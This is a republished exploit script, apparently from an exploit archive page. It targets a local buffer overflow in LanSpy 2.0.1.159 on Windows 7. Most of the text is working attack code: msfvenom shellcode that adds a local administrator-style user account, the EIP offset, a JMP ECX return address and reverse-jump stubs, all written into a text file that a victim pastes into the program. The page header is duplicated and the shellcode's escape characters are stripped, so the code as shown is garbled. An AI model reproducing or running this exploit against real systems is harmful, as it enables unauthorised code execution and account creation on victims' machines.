LanSpy 2.0.1.159 Local Buffer Overflow

Details
Category: Vulnerabilities
Hits: 232
#!/usr/bin/python

#------------------------------------------------------------------------------------------------------------------------------------#
# Exploit: LanSpy 2.0.1.159 - L #!/usr/bin/python

#------------------------------------------------------------------------------------------------------------------------------------#
# Exploit: LanSpy 2.0.1.159 - Local Buffer Overflow RCE(PoC) #
# Date: 2018-12-16 #
# Author: Juan Prescotto #
# Tested Against: Win7 Pro SP1 64 bit #
# Software Download #1: https://www.exploit-db.com/apps/70a780b78ee7dbbbbc99852259f75d53-lanspy_setup_2.0.1.159.exe #
# Software Download #2: https://lizardsystems.com/download/lanspy_setup.exe #
# Version: 2.0.1.159 #
# Special Thanks to my wife for allowing me spend countless hours on this passion of mine #
# Credit: Thanks to Gionathan "John" Reale (https://www.exploit-db.com/exploits/45968) for his work on the Denial of Service exploit #
# Steps : Open the APP > click on the scan field > paste in contents from the .txt file that was generated by this script #
#------------------------------------------------------------------------------------------------------------------------------------#
# Bad Characers: x00 thru x20 and x2cx2d #
# EIP Offset: 680 #
# Non-Participating Modules: lanspy.exe #
#------------------------------------------------------------------------------------------------------------------------------------#
# Run LanSpy with Administrative Rights, when exploit.txt contents are pasted into scan field and run a Local User will be created: #
# User: Metasploit Password: MyPassword12 #
#------------------------------------------------------------------------------------------------------------------------------------#
# EIP overwrite --> JMP ECX --> Short Relative Reverse JMP --> Long Relative Reverse JMP --> NoPs --> Stack Adjustment --> Shellcode #
#------------------------------------------------------------------------------------------------------------------------------------#

#msfvenom -p windows/adduser USER=metasploit PASS=MyPassword12 --bad-chars x00x01x02x03x04x05x06x07x09x0ax0bx0cx0dx0fx10x11x12x13x14x1ax1bx1cx1dx1ex1fx2c --format python -v shellcode
#Payload size: 626 bytes

shellcode = ""
shellcode += "x89xe5xdaxd1xd9x75xf4x5bx53x59x49x49"
shellcode += "x49x49x49x49x49x49x49x49x43x43x43x43"
shellcode += "x43x43x37x51x5ax6ax41x58x50x30x41x30"
shellcode += "x41x6bx41x41x51x32x41x42x32x42x42x30"
shellcode += "x42x42x41x42x58x50x38x41x42x75x4ax49"
shellcode += "x39x6cx39x78x6bx32x65x50x45x50x73x30"
shellcode += "x31x70x6dx59x58x65x36x51x4fx30x43x54"
shellcode += "x6cx4bx56x30x70x30x6ex6bx63x62x54x4c"
shellcode += "x4ex6bx66x32x65x44x6cx4bx54x32x47x58"
shellcode += "x76x6fx68x37x30x4ax31x36x75x61x69x6f"
shellcode += "x6ex4cx75x6cx35x31x43x4cx55x52x36x4c"
shellcode += "x45x70x4bx71x78x4fx76x6dx65x51x69x57"
shellcode += "x6dx32x4cx32x33x62x53x67x4cx4bx61x42"
shellcode += "x42x30x6cx4bx31x5ax47x4cx6ex6bx50x4c"
shellcode += "x52x31x54x38x6ax43x47x38x75x51x7ax71"
shellcode += "x46x31x4cx4bx36x39x35x70x47x71x38x53"
shellcode += "x4ex6bx43x79x67x68x39x73x35x6ax73x79"
shellcode += "x4ex6bx34x74x6cx4bx75x51x6ax76x35x61"
shellcode += "x4bx4fx4cx6cx7ax61x48x4fx64x4dx67x71"
shellcode += "x68x47x37x48x6bx50x32x55x39x66x33x33"
shellcode += "x53x4dx4ax58x37x4bx43x4dx65x74x52x55"
shellcode += "x38x64x73x68x6ex6bx46x38x75x74x73x31"
shellcode += "x78x53x72x46x6ex6bx54x4cx30x4bx6ex6b"
shellcode += "x63x68x75x4cx36x61x58x53x6ex6bx47x74"
shellcode += "x6cx4bx35x51x68x50x4bx39x50x44x46x44"
shellcode += "x54x64x61x4bx73x6bx53x51x56x39x43x6a"
shellcode += "x53x61x6bx4fx79x70x63x6fx53x6fx62x7a"
shellcode += "x4ex6bx54x52x5ax4bx4ex6dx61x4dx72x4a"
shellcode += "x46x61x6cx4dx4dx55x78x32x57x70x55x50"
shellcode += "x63x30x52x70x62x48x34x71x6cx4bx32x4f"
shellcode += "x4bx37x59x6fx4ex35x6dx6bx6cx30x78x35"
shellcode += "x6ex42x71x46x61x78x59x36x6dx45x4fx4d"
shellcode += "x6fx6dx79x6fx4ex35x57x4cx57x76x43x4c"
shellcode += "x57x7ax4dx50x4bx4bx4dx30x61x65x43x35"
shellcode += "x4dx6bx31x57x54x53x44x32x52x4fx33x5a"
shellcode += "x75x50x72x73x4bx4fx69x45x73x53x50x6d"
shellcode += "x62x44x54x6ex51x75x44x38x65x35x31x30"
shellcode += "x66x4fx35x33x31x30x42x4ex33x55x61x64"
shellcode += "x77x50x52x55x63x43x50x65x61x62x67x50"
shellcode += "x52x4dx51x75x54x34x73x51x61x63x70x70"
shellcode += "x50x6cx70x6fx63x59x64x34x55x70x50x4d"
shellcode += "x31x69x50x50x70x61x74x33x44x33x54x37"
shellcode += "x42x4fx34x32x73x54x34x71x54x72x67x50"
shellcode += "x54x6fx32x61x51x54x77x34x71x30x76x46"
shellcode += "x36x46x31x30x30x6ex51x75x31x64x55x70"
shellcode += "x70x6cx42x4fx70x63x70x61x70x6cx70x67"
shellcode += "x72x52x30x6fx72x55x44x30x35x70x51x51"
shellcode += "x73x54x42x4dx55x39x72x4ex50x69x71x63"
shellcode += "x32x54x34x32x31x71x70x74x50x6fx54x32"
shellcode += "x64x33x51x30x30x6dx35x35x64x34x70x61"
shellcode += "x70x73x32x50x32x4cx70x6fx45x39x71x64"
shellcode += "x77x50x56x4fx72x61x43x74x63x74x63x30"
shellcode += "x41x41"

if len(shellcode) > 633:
exit("[+] Shellcode is too big! Shellcode must be smaller than 633 bytes")

sled = "x90" * 8

#Necessary to allow shellcode room to operate
stack_adjust = "x83xecx78" * 10

reverse_jmp_long = "xe9x5cxfdxffxff"

reverse_jmp_short = "x41xebxf6x41"

junk = "x41" * (680 - len(sled) - len(stack_adjust) - len(shellcode) - len(reverse_jmp_long) - len(reverse_jmp_short))

#004040AD JMP ECX (lanspy.exe)
eip = "xadx40x40"

payload = sled + stack_adjust + shellcode + junk + reverse_jmp_long + reverse_jmp_short + eip
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"